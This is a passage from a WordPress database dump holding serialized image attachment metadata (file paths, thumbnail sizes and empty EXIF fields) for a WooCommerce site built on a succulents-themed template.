ium\";a:4:{s:4:\"file\";s:27:\"portfolio-img-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"portfolio-img-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"portfolio-img-3-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:27:\"portfolio-img-3-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:27:\"portfolio-img-3-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:27:\"portfolio-img-3-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:27:\"portfolio-img-3-800x550.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:27:\"portfolio-img-3-550x800.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:27:\"portfolio-img-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"portfolio-img-3-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"portfolio-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1397,3757,'_wp_attachment_image_alt','o'),(1398,3736,'_wp_attachment_image_alt',''),(1399,3757,'_wp_attachment_image_alt','o'),(1400,3778,'_wp_attached_file','2018/03/home-10.png'),(1401,3778,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:665;s:6:\"height\";i:412;s:4:\"file\";s:19:\"2018/03/home-10.png\";s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:19:\"home-10-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"home-10-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:19:\"home-10-600x372.png\";s:5:\"width\";i:600;s:6:\"height\";i:372;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"home-10-300x186.png\";s:5:\"width\";i:300;s:6:\"height\";i:186;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"home-10-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:19:\"home-10-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:19:\"home-10-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:19:\"home-10-550x412.png\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:19:\"home-10-550x412.png\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:19:\"home-10-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:19:\"home-10-600x372.png\";s:5:\"width\";i:600;s:6:\"height\";i:372;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"home-10-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1402,3396,'_wp_attachment_image_alt','o'),(1403,4258,'_wp_attached_file','2018/03/home-10-1.png'),(1404,4258,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:665;s:6:\"height\";i:412;s:4:\"file\";s:21:\"2018/03/home-10-1.png\";s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"home-10-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"home-10-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:21:\"home-10-1-600x372.png\";s:5:\"width\";i:600;s:6:\"height\";i:372;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"home-10-1-300x186.png\";s:5:\"width\";i:300;s:6:\"height\";i:186;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"home-10-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:21:\"home-10-1-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:21:\"home-10-1-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:21:\"home-10-1-550x412.png\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"home-10-1-550x412.png\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"home-10-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:21:\"home-10-1-600x372.png\";s:5:\"width\";i:600;s:6:\"height\";i:372;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"home-10-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1405,385,'_wp_attachment_image_alt','a'),(1406,3397,'_wp_attached_file','2018/02/landing-slide1-graphic2.png'),(1407,3397,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:434;s:6:\"height\";i:218;s:4:\"file\";s:35:\"2018/02/landing-slide1-graphic2.png\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"landing-slide1-graphic2-300x218.png\";s:5:\"width\";i:300;s:6:\"height\";i:218;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic2-300x151.png\";s:5:\"width\";i:300;s:6:\"height\";i:151;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic2-300x218.png\";s:5:\"width\";i:300;s:6:\"height\";i:218;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:35:\"landing-slide1-graphic2-300x218.png\";s:5:\"width\";i:300;s:6:\"height\";i:218;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1408,390,'_wp_attached_file','2018/01/book-advert-for-new-web-small.jpg'),(1409,390,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:353;s:6:\"height\";i:235;s:4:\"file\";s:41:\"2018/01/book-advert-for-new-web-small.jpg\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:41:\"book-advert-for-new-web-small-300x235.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:41:\"book-advert-for-new-web-small-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:41:\"book-advert-for-new-web-small-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:41:\"book-advert-for-new-web-small-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:41:\"book-advert-for-new-web-small-300x235.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:41:\"book-advert-for-new-web-small-300x235.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:41:\"book-advert-for-new-web-small-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:13:\"Sara Chadwick\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1410,4258,'_wp_attachment_image_alt','o'),(1411,4257,'_wp_attachment_image_alt','o'),(1412,3397,'_wp_attachment_image_alt','o'),(1413,3397,'_wp_attachment_image_alt','o'),(1414,390,'_wp_attachment_image_alt','o'),(1415,3398,'_wp_attached_file','2018/02/landing-slide1-graphic3.png'),(1416,3398,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:570;s:6:\"height\";i:180;s:4:\"file\";s:35:\"2018/02/landing-slide1-graphic3.png\";s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"landing-slide1-graphic3-300x180.png\";s:5:\"width\";i:300;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"landing-slide1-graphic3-300x95.png\";s:5:\"width\";i:300;s:6:\"height\";i:95;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic3-300x180.png\";s:5:\"width\";i:300;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic3-550x180.png\";s:5:\"width\";i:550;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic3-550x180.png\";s:5:\"width\";i:550;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:35:\"landing-slide1-graphic3-300x180.png\";s:5:\"width\";i:300;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1417,3778,'_wp_attachment_image_alt','o'),(1418,4259,'_wp_attached_file','2018/02/landing-slide1-graphic3-1.png'),(1419,4259,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:570;s:6:\"height\";i:180;s:4:\"file\";s:37:\"2018/02/landing-slide1-graphic3-1.png\";s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:37:\"landing-slide1-graphic3-1-300x180.png\";s:5:\"width\";i:300;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:37:\"landing-slide1-graphic3-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic3-1-300x95.png\";s:5:\"width\";i:300;s:6:\"height\";i:95;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"landing-slide1-graphic3-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:37:\"landing-slide1-graphic3-1-300x180.png\";s:5:\"width\";i:300;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:37:\"landing-slide1-graphic3-1-550x180.png\";s:5:\"width\";i:550;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:37:\"landing-slide1-graphic3-1-550x180.png\";s:5:\"width\";i:550;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:37:\"landing-slide1-graphic3-1-300x180.png\";s:5:\"width\";i:300;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:37:\"landing-slide1-graphic3-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1420,3901,'_wp_attached_file','2018/01/recipe-img-4.jpg'),(1421,3901,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:363;s:6:\"height\";i:538;s:4:\"file\";s:24:\"2018/01/recipe-img-4.jpg\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:24:\"recipe-img-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"recipe-img-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"recipe-img-4-202x300.jpg\";s:5:\"width\";i:202;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"recipe-img-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:24:\"recipe-img-4-363x300.jpg\";s:5:\"width\";i:363;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:24:\"recipe-img-4-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:24:\"recipe-img-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"recipe-img-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1422,4260,'_wp_attached_file','2018/01/recipe-img-4-1.jpg'),(1423,4260,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:363;s:6:\"height\";i:538;s:4:\"file\";s:26:\"2018/01/recipe-img-4-1.jpg\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"recipe-img-4-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"recipe-img-4-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"recipe-img-4-1-202x300.jpg\";s:5:\"width\";i:202;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"recipe-img-4-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:26:\"recipe-img-4-1-363x300.jpg\";s:5:\"width\";i:363;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:26:\"recipe-img-4-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:26:\"recipe-img-4-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"recipe-img-4-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1424,393,'_wp_attached_file','2018/01/team-img-1.jpg'),(1425,393,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:715;s:6:\"height\";i:660;s:4:\"file\";s:22:\"2018/01/team-img-1.jpg\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"team-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"team-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:22:\"team-img-1-600x554.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:554;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"team-img-1-300x277.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:277;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"team-img-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:22:\"team-img-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:22:\"team-img-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:22:\"team-img-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:22:\"team-img-1-715x550.jpg\";s:5:\"width\";i:715;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:22:\"team-img-1-550x660.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:22:\"team-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"team-img-1-600x554.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:554;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"team-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1426,2285,'_wp_attachment_image_alt','o'),(1427,1004,'_wp_attachment_image_alt','a'),(1428,3901,'_wp_attachment_image_alt','a'),(1429,2377,'_wp_attached_file','2018/02/h9-img-7.jpg'),(1430,2377,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:187;s:6:\"height\";i:134;s:4:\"file\";s:20:\"2018/02/h9-img-7.jpg\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h9-img-7-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h9-img-7-150x134.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:134;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h9-img-7-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12: